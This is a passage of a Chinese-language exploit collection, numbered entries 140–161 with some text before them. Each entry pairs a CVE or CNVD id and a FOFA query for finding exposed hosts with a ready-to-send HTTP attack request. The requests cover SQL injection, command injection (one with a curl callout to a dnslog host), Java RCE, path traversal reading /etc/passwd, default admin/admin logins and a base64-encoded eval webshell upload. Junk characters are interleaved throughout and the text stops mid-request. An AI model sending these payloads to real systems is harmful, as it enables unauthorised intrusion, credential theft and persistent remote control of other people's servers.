# I7 x4 |4 L( N: Z) |FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 \, n' H& ?& x, i# l( A% k
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1- w7 u; _" ^( f+ A) ~' D
Host: x.x.x.x$ j, v* \# j; E9 K6 B' r! B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 K1 T4 G2 F* f p- y" D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, I' [$ D# U6 Z9 Z# |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Z+ |5 q: s% U- U/ D. j; A z7 f
Accept-Encoding: gzip, deflate, br6 f( t9 F# s ~, G! R" ~3 G& w
Connection: close
x; w- ?$ \) _Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
* a+ p- q$ B+ OUpgrade-Insecure-Requests: 1
9 G& n( c* n, Y* h2 _$ ^3 y
" W+ ^. `! o9 ~1 ^" Z1 }0 @) k; z8 H, ?/ c& O9 Q* F" H3 c2 _# X
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入( v9 y! U# Q- j3 {; J M# q
CVE-2024-2566( C2 `: q4 p; U# {8 X5 p
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台" ^3 S2 e/ H; J2 X5 R3 G
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
+ }. V! ]3 g2 t- O3 S3 KHost: x.x.x.x; E; ?! n, h* o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( G1 ^2 K9 Y. O- Q+ [& Z) v. |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 Y9 H2 V6 E, J; w: `% Q' L. X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ C* p- m9 N0 v9 Y
Accept-Encoding: gzip, deflate, br: T8 l, ?2 J" c" R& P) c% F
Connection: close/ w1 o Q1 I! p7 Y- N1 C9 ~: h; _4 A9 a
Cookie: authcode=h8g9
" Z# V& u2 N. a" D: R% T1 BUpgrade-Insecure-Requests: 1* o$ {3 t8 G1 m
8 C7 V9 S6 T# Z: ~( a: A+ G* L$ L( w4 y/ Q9 N' L4 I4 o2 X
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入1 i: m& g# K: ~4 ?8 C
FOFA:body="指挥调度管理平台"
# s- J B/ j& m5 B* APOST /app/ext/ajax_users.php HTTP/1.1" }0 D( j3 e% A3 G
Host: your-ip% S) S9 `0 o$ \0 y# `
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info/ e) K/ m- v! U, t# k
Content-Type: application/x-www-form-urlencoded+ ]1 U/ j8 ^% q
1 X! g) j3 w8 }# E
) L! D" f9 |% X/ w$ b! y0 W: c
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -& W5 {: v8 o; V0 P' P" o9 [
8 h! S) O5 G- t! z6 k
5 a) L* {+ a& S, V I7 ]142. CMSV6车辆监控平台系统中存在弱密码
' Z$ o2 I+ _2 vCVE-2024-29666
- r& H7 t6 e) b& \FOFA:body="/808gps/"
/ E" A: |! {8 g* `+ ^# I0 _admin/admin( N7 u0 R% d. s
143. Netis WF2780 v2.1.40144 远程命令执行# o+ {7 N( C9 W: v
CVE-2024-25850, h9 Q9 ^7 e1 C9 Q0 {
FOFA:title='AP setup' && header='netis'
: c' ~! B7 o% JPAYLOAD
2 e ]8 v$ p; i
% r) l0 O. R( g3 t1 H144. D-Link nas_sharing.cgi 命令注入
9 m0 V! F" q: O y5 |FOFA:app="D_Link-DNS-ShareCenter"' V2 Z8 ]- u* j3 S3 G
system参数用于传要执行的命令
$ ~1 p5 z4 w7 A* u6 lGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
0 P' Q7 C1 e) L4 ?3 k. C! CHost: x.x.x.x5 l" l- F* `* C' c: w
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0% Q# o9 x7 u$ ] i# c4 c7 ~
Connection: close! q. E( d6 D9 r0 x: n2 s1 C/ P
Accept: */*
. y: t! R; y, Z& pAccept-Language: en
' g$ q( V; k& \Accept-Encoding: gzip
! b( [- ~1 ^& m4 C& l
- c8 E$ S6 D# S. w+ Q; P" U ~6 e: Y& o- t; [ R3 x4 |9 x' @
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# E3 F5 |- }! {( |1 B
CVE-2024-3400* n/ N a' U: a: W( \; e
FOFA:icon_hash="-631559155"( \& m( i; k3 [# y. ]' _
GET /global-protect/login.esp HTTP/1.1( k/ V$ v4 F* a8 P; f: }/ d
Host: 192.168.30.112:1005+ P6 }3 ]# ^7 j7 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
, z) S q6 W( s6 k$ S1 ^Connection: close3 D% L* e8 A% w! y+ ]
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
. t1 {* _: j# i' c% ?( x0 }7 eAccept-Encoding: gzip
2 C' `/ O# k/ N# B! j" f: P2 y2 T8 o3 J, |+ j; N. ~% [) Z. e
! p' V/ o% W# J: N) Y$ s2 y7 j
146. MajorDoMo thumb.php 未授权远程代码执行+ D) w, e7 i$ B2 E; O; T: H, L3 }
CNVD-2024-02175
7 l# Z3 H% h% N! P. \: d) |FOFA:app="MajordomoSL"
6 q' ^/ N) E; c0 O7 U, uGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1) J8 `5 s" }2 ?
Host: x.x.x.x. r2 [! b/ }" `; k* g& v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84- P# _! u1 M$ O" @1 _
Accept-Charset: utf-8
! a; F7 R5 F2 G& ~5 }Accept-Encoding: gzip, deflate
* q* u+ [3 A: I: @6 ?% MConnection: close2 K' Q3 ^* y8 V5 s5 e
4 K" q2 o( @# P/ V4 y
; I* j' T4 v5 z' D
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历" r( ~5 J: O5 ^$ h2 {& [
CVE-2024-32399
+ I+ _2 h9 u3 b, c7 u( n2 b( X- z. AFOFA:body="RaidenMAILD"5 }3 x6 ]- h/ b4 @, s
GET /webeditor/../../../windows/win.ini HTTP/1.1
8 A0 T* r& B9 |' C) CHost: 127.0.0.1:81/ |5 M5 ^5 p/ O# x* W
Cache-Control: max-age=0
) F9 w9 C, V* r' e9 |$ t) [5 GConnection: close# J) R4 s7 b$ m5 Y" D% W$ S
; v) o4 S1 `$ X# h6 i9 } |# c0 ?( s3 Z, U* T
148. CrushFTP 认证绕过模板注入& Y3 |- h* G. E$ Z8 z
CVE-2024-4040 F4 _' [1 I$ i; X' E
FOFA:body="CrushFTP"
4 a$ n. F0 P" A( ?( cPAYLOAD
0 a) _6 H; n' [. y$ p4 n( X/ K) K
6 U8 E& t" O: d e! r149. AJ-Report开源数据大屏存在远程命令执行
. F4 L9 \6 c) ?FOFA:title="AJ-Report"
' P0 `/ C9 u, Y8 F
6 K& f6 Y* l2 @6 ^$ I' d9 r, @! ?POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
; `4 W" e9 t5 x+ O5 BHost: x.x.x.x
0 Y" Q- {, L4 x7 n0 r# vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) l% S d. A' o% g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 A5 e2 h. L& vAccept-Encoding: gzip, deflate, br
) h( V `" Z0 ?( | dAccept-Language: zh-CN,zh;q=0.9( }; a0 G' J! z; m3 U
Content-Type: application/json;charset=UTF-8$ c# I+ O, w, `( H
Connection: close
" E: c8 X2 D7 G, }6 \% w* `, n( J, @6 k. _. G0 s
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 s" |7 {8 g& T9 r& z" t3 M. _
0 \2 w, u( S* K# C5 b5 A150. AJ-Report 1.4.0 认证绕过与远程代码执行
V# ]9 J0 t0 MFOFA:title="AJ-Report"
% f4 q. f! F; s. w3 vPOST /dataSetParam/verification;swagger-ui/ HTTP/1.16 y; I N- a- s% f. z- C
Host: x.x.x.x- s6 k- G; d* T- g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 I; d, U2 p9 C$ G8 H! z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 B9 {$ `0 d* ^Accept-Encoding: gzip, deflate, br/ J3 l8 [ c$ M% a
Accept-Language: zh-CN,zh;q=0.9
2 l- L; Y5 s5 X. xContent-Type: application/json;charset=UTF-8% j$ l/ y/ Z* l8 {% D3 Q3 _5 ]
Connection: close
; Q: ^4 Z- K& y2 [1 U3 k* HContent-Length: 339' n1 F1 I; U S. x# d
# a o. ]! u) w. ?# ^' J4 ]8 i7 }{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
- h8 y$ W! ~6 |8 f* ^8 R1 T3 t8 I" l/ Z, |
" ?% ?: @9 i' ]/ a
151. AJ-Report 1.4.1 pageList sql注入, p# L7 z1 t, k, b' G2 i5 L
FOFA:title="AJ-Report"
, N* `! U9 e9 c& q5 N7 m8 r+ N) u1 fGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
# E5 Z& F" B0 W0 z2 uHost: x.x.x.x
& H/ U* d1 c) `7 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" y' X% q" b. \; A( x1 ]
Connection: close
4 u6 `) a5 y; B) y) K0 _Accept-Encoding: gzip
3 f0 X4 x" k, N' @5 N8 O/ X( k, N1 x% D' N
0 h3 X3 m# h5 Q( X5 X3 L0 O
152. Progress Kemp LoadMaster 远程命令执行% a7 G) t5 I d, Z7 I% {8 c
CVE-2024-1212+ a* U: h z6 t5 B
LoadMaster <= 7.2.59.2 (GA); y; N& F0 X) ^& E! |; h0 t: T9 t& x
LoadMaster<=7.2.54.8 (LTSF)
- m) j, a4 H- ?; `8 [3 ^! {. PLoadMaster <= 7.2.48.10 (LTS)
7 E# K& f: G1 J0 ~: h. [) kFOFA:body="LoadMaster"8 {8 E* ^0 k% A* i6 e7 d
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码! z' u1 v8 e+ R$ d7 F0 o
GET /access/set?param=enableapi&value=1 HTTP/1.1
8 Q% u3 b, _8 B! G- y' AHost: x.x.x.x5 e; Z! V) X* }% k$ @6 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
4 v' y: i& W% ?' HConnection: close3 |) n( A c, O
Accept: */*
9 l. M; q# R; e: E: c( J' E- _& qAccept-Language: en2 l. p& N' y( g; ]4 Q
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
% T0 b1 r$ p& g0 B8 B/ [6 zAccept-Encoding: gzip
* k1 n# L6 i: Q3 |0 }, r& X, _ K4 e- s5 s* _: ?) i2 j
* E ^- J) D$ P& h1 Q153. gradio任意文件读取
8 O$ x8 Y$ S! {( i, E* hCVE-2024-1561FOFA:body="__gradio_mode__"
- m+ n3 y+ L/ c6 R第一步,请求/config文件获取componets的id
6 o0 b6 F7 u N8 Bhttp://x.x.x.x/config
( S( H; O0 }+ f6 L$ m2 \! Z' v6 K" U- M* s
' a$ L2 V) ?- a8 s* {# }第二步,将/etc/passwd的内容写入到一个临时文件" v" y: U* i/ G" Z
POST /component_server HTTP/1.1
" O0 _& s6 P# ?8 RHost: x.x.x.x
: o4 l, V* m9 \( k4 p/ l- s8 A* u* fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' b# }7 r5 b9 t' o; P$ l6 N3 J
Connection: close8 V+ s, @, |, y8 x( T* P
Content-Length: 115/ F: w+ t8 j9 h( y/ y/ f
Content-Type: application/json
0 ]2 M% V* O. {9 q! ?2 V2 gAccept-Encoding: gzip
/ f3 s1 I9 x. N8 V: {$ K( @% \; Y- R0 ^- n
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
" A: s/ u7 j( q& V+ {
& q' F+ w4 h4 p$ Y, L- M: T" s2 F' [3 }3 N2 u( D
第三步访问3 V8 [; C1 U x d; g
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
0 _0 o6 S) P7 ^% M1 m3 `! C
' I1 c# L$ |. N' ]- ~. ~5 s' n! {6 h* \+ ^/ Z
154. 天维尔消防救援作战调度平台 SQL注入
. G+ n6 A& `6 V2 E- M) `( UCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"; O) I5 T1 U" r5 v J0 P8 z7 v5 ~4 P
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
y( i1 p" \! rHost: x.x.x.x
$ x G1 S' s0 W# h! t7 ?Content-Length: 106; H4 A7 w \3 e8 }. A! r
Cache-Control: max-age=0
% v- x9 a# Y! Z! Q0 FUpgrade-Insecure-Requests: 1
5 v) A, U- D+ ], ?( O$ vOrigin: http://x.x.x.x- W8 o! w( I1 e9 i9 q8 r/ V% ~' W
Content-Type: application/json
6 ~' z# |. R/ V' G kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.362 r3 R1 g$ k6 `4 C6 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" X! A2 x% Y& y e4 r
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page5 y" }! W9 w( d7 k
Accept-Encoding: gzip, deflate
. R; w6 r1 \& Q+ u5 ]& L' }Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+ h8 l. } H; Y0 L: f5 {Connection: close; [/ X7 K7 i( J3 s/ n5 [
@1 @, j. ^1 h7 ]% D
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
, S8 b: L7 z+ i1 {0 ?- H2 w6 [- A2 p6 `# [4 r& H& i
+ L: i* R% I& _2 K; ]( F$ m155. 六零导航页 file.php 任意文件上传- h6 E# t/ A( Q& D
CVE-2024-34982. W7 c/ ?( E. E' r
FOFA:title=="上网导航 - LyLme Spage"$ n, _- W- @% W" G, `; ^* D
POST /include/file.php HTTP/1.15 {5 w2 @9 x4 f% @
Host: x.x.x.x# a- g' I# r) T$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 I0 K/ G0 b' ]8 u& j8 GConnection: close
b P8 I$ X% MContent-Length: 232
2 [9 w8 }. `* l7 V0 TAccept: application/json, text/javascript, */*; q=0.01* z) I1 E0 o. z& o
Accept-Encoding: gzip, deflate, br' M! p" t% [- t/ h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ z. i$ g+ N: k/ RContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f3 C. k' ?* }7 W j0 d! l3 o X
X-Requested-With: XMLHttpRequest
+ Y' e2 Q# P) ]% a. R5 t- T0 ]$ x& O
4 ?% {; R6 Q8 U# E d1 l-----------------------------qttl7vemrsold314zg0f
3 B) x' y! f, a4 j5 g) c8 oContent-Disposition: form-data; name="file"; filename="test.php"+ t+ i* P L6 ^
Content-Type: image/png4 K% R0 x0 j9 c4 U8 ^8 P R
5 T5 O/ z9 H3 m' ^5 _
<?php phpinfo();unlink(__FILE__);?>+ G7 D) y+ {& j3 u. P! c/ ?
-----------------------------qttl7vemrsold314zg0f--: I" E1 v/ y- D- Z$ x8 D
. O5 n. J3 X# y. }: Y" K1 K
: n, F: P [# N访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php% O- k- ^" a( [2 \
$ A1 a* l" W+ a% u% \
156. TBK DVR-4104/DVR-4216 操作系统命令注入
8 U+ w, P- X. d9 s2 aCVE-2024-3721
0 b) A! M l7 h& l K3 W( L9 {FOFA:"Location: /login.rsp"
$ X0 U- w- V2 S* C- F) q1 @" U! a·TBK DVR-41040 k: U! c. O# a
·TBK DVR-4216
* `0 V: g9 m9 L( qcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
8 e: V! d( y6 M7 Z, P" J) A/ p0 F% d
0 E5 l. p" M# c- Z7 I4 O) G' H9 r
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1% }4 e6 m1 f5 f; [
Host: x.x.x.x% H! N: f6 e2 t/ o1 K
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 X2 s/ N# \; `2 O# x
Connection: close
1 I+ \$ F1 C: x8 E6 AContent-Length: 0( q+ S$ u, \/ ^5 C, C% ?
Cookie: uid=1
. p- [* u d; e- g$ W9 MAccept-Encoding: gzip
* P& ]' _* _$ d U& E8 v& S) V4 R# e) k3 ^* c# t
; |* u; M, [7 Z9 Z% H
157. 美特CRM upload.jsp 任意文件上传, k P G' j; ^' N+ ~2 O. K6 s
CNVD-2023-06971+ O+ V% H z2 K0 d
FOFA:body="/common/scripts/basic.js"
9 L. E$ e* {" FPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
" a/ Y4 ?0 h: h+ P) E; K' h' @Host: x.x.x.x' q8 y5 Y: b$ B% d7 R. i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.367 V$ r1 i3 W+ [; P/ V/ ~
Content-Length: 709% B: K; g- P3 }# I H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ m0 I6 k; A. A- }Accept-Encoding: gzip, deflate
2 o# z. S/ p( F, K7 j& ^Accept-Language: zh-CN,zh;q=0.9
) I, q5 q$ h4 ]$ [% _6 rCache-Control: max-age=0/ K; S9 o2 s% ~1 J& O5 |5 @
Connection: close
/ Z2 ^' `" a3 ~& ^( o; `/ K* HContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
) g7 p1 C; ]% r8 R0 XUpgrade-Insecure-Requests: 1
7 t3 U: ~! g4 O5 @3 \; M- ?3 d
4 F3 d8 P- B8 y------WebKitFormBoundary1imovELzPsfzp5dN w4 `! l% Z# R! Q1 }
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
7 }6 |! r4 [ ~, {& v% Z5 U& bContent-Type: application/octet-stream5 m* @) Q S7 t$ F4 {
$ u7 e0 j# N2 P9 p% @1 Wnyhelxrutzwhrsvsrafb
) e4 O) j p7 `# q e% I6 I------WebKitFormBoundary1imovELzPsfzp5dN9 H$ v7 m+ W4 ?& K+ e
Content-Disposition: form-data; name="key"2 c2 `) U7 M! _7 y. N/ h3 I8 o' ?
( {, a3 i6 f1 I9 q. Tnull2 p. j2 x9 _# e' N9 Q
------WebKitFormBoundary1imovELzPsfzp5dN' K+ M5 T e( @) R" l
Content-Disposition: form-data; name="form"2 V3 b. g. U* u t
" U0 r; }$ ^! N) h; @null9 K. f# ?+ N X. a7 f* Z/ _
------WebKitFormBoundary1imovELzPsfzp5dN
4 i3 L6 D7 k2 B7 yContent-Disposition: form-data; name="field"1 ]) K* F6 }! c7 N5 E2 D
/ V9 b2 v) p. u' O) R: a# \2 M
null
/ c, P9 c( [7 J' T0 K------WebKitFormBoundary1imovELzPsfzp5dN
7 a* ~7 G* z$ w5 U& ]Content-Disposition: form-data; name="filetitile"
, v9 i6 n% W, B1 a" n, `: h; d$ j, |$ B# G4 [
null
8 s/ u8 a. a6 }8 ^' P6 l------WebKitFormBoundary1imovELzPsfzp5dN9 ~. x L, e5 m1 O$ M" V* M
Content-Disposition: form-data; name="filefolder": l3 z9 l; ]! c) r
" M I9 X7 ?" _8 r
null7 C, n" Z Q. X& c
------WebKitFormBoundary1imovELzPsfzp5dN--
" K: t! F: y- Q. S* W" p8 r! j( b* s) q
( h u- H8 [6 V/ B
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp ]* m1 c# C/ @! {
& l, Q8 y$ | k- |$ W( P4 w
158. Mura-CMS-processAsyncObject存在SQL注入# w8 E. k$ |# T5 O7 K$ K
CVE-2024-32640
H3 m5 k4 f1 c; D: ?FOFA:"Generator: Masa CMS", f7 }- w$ s! a8 f
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
$ C# p# D8 {8 ^ m4 jHost: {{Hostname}}9 i- m1 U, Q: ]+ t
Content-Type: application/x-www-form-urlencoded8 N) V. S" G( A [, o$ L) K1 {
/ D# A/ a2 G6 e8 w0 e4 Wobject=displayregion&contenthistid=x\'&previewid=1
. @, ~6 A. w& p; }+ @
! F) v7 u$ \, b9 h, o" P5 Z5 \* G4 \- j! u, a; K
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传0 M9 r) b7 G B/ @
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")* ]' R9 [* G# t. X8 K3 o% l6 y
POST /webservices/WebJobUpload.asmx HTTP/1.1& b* _1 w4 O6 h1 S* m
Host: x.x.x.x
8 ]* f0 n) |/ j( O4 @& aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
0 _* k) U4 D3 T @. h2 {Content-Length: 1080) @) ?' ~' I( O0 W ^& |/ V1 s
Accept-Encoding: gzip, deflate0 S) l3 u3 b. `0 F6 y: j
Connection: close9 l3 U0 ~0 V, A% \
Content-Type: text/xml; charset=utf-8( e! @6 c4 }0 v
Soapaction: "http://rainier/jobUpload"
0 g6 j" |- U8 ]% H' U3 l7 u. @3 x) `; ]. ]4 M
<?xml version="1.0" encoding="utf-8"?>0 ~: }% V% [9 d5 K8 d; }
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
6 r9 j2 g8 h3 r& a<soap:Body>3 n: ^0 t' s1 f- R4 X$ X
<jobUpload xmlns="http://rainier">- D. O7 V) |5 r" A" h" ?
<vcode>1</vcode>
, E( D+ H1 M! p8 t2 I) V* G" i<subFolder></subFolder>
8 B# z/ I1 `7 ?7 Z0 C<fileName>abcrce.asmx</fileName>
2 {, b" P# P0 P8 M J9 q<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>. ^: W% l4 Q& W7 }3 ?# c- F
</jobUpload>
, t. C+ D. [% o9 n! c$ _</soap:Body>
9 R& \5 i% r L6 ~6 M( R" k</soap:Envelope>
% m/ ~$ m0 \: R# W: t; V7 f1 Q7 o. f3 d) B# b, T
# g+ O5 J: v! E: a+ Z+ h/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")& ]* p3 ]( H# r7 y2 @- T2 \
9 j; ?: b) W, u
- m, y/ L: N$ G" ?* T3 v160. Sonatype Nexus Repository 3目录遍历与文件读取" S% s% e% e3 B' c6 M8 [* {
CVE-2024-4956
' a( m& L7 H1 g9 `2 u7 ZFOFA:title="Nexus Repository Manager"! u3 w/ `( X! ?$ W
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
4 G m: M2 V7 O+ { P/ ~Host: x.x.x.x- P; y, Y3 Q+ s5 [8 ?- \
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
6 P7 C4 p$ s V/ G4 uConnection: close/ k3 x" h; y/ Q1 k( O$ {$ [
Accept: */*5 s+ K( G3 u$ p5 L, v
Accept-Language: en
8 D0 ~$ v L d2 JAccept-Encoding: gzip* K. m* N9 R @$ P* c
" f! N# ]+ `* O# G
4 A/ t' D, u6 I' J, m# E3 z, J
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传0 }% Q k/ I9 ?1 O
FOFA:body="/KT_Css/qd_defaul.css"$ k; }' ^) }3 S& ^5 H/ A C0 I6 w: W3 E
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密9 D3 J( C( l% k5 F3 D
POST /Webservice.asmx HTTP/1.1. k$ y8 E# `. {9 ]5 {2 j2 @
Host: x.x.x.x9 N# g0 m+ R* |9 w: Y& s2 O s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. K5 h) c2 r6 X4 w- g
Connection: close) q* s, M/ l3 ~2 b' N- J
Content-Length: 4453 i. X1 M2 _: A5 i0 f
Content-Type: text/xml
6 d( v2 n% E9 ]7 T2 n$ `Accept-Encoding: gzip
+ r8 Q( i2 Q7 J8 o( q& [, V
+ _! i, m0 _1 w |" m9 ^' v J<?xml version="1.0" encoding="utf-8"?>& c a* V) \ |& y
<soap:Envelope xmlns:xsi="' |) c4 @( `5 b c
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
& j$ H5 J" `; T" Z' O- ixmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
k( A7 ]- i: m$ ]! M, |<soap:Body>- `& K) k6 D* s! t7 I& b# t
<UploadResume xmlns="http://tempuri.org/">: `1 v( t" X1 r L" i6 i, C
<ip>1</ip>& K a. Y! L( q+ M% W
<fileName>../../../../dizxdell.aspx</fileName>
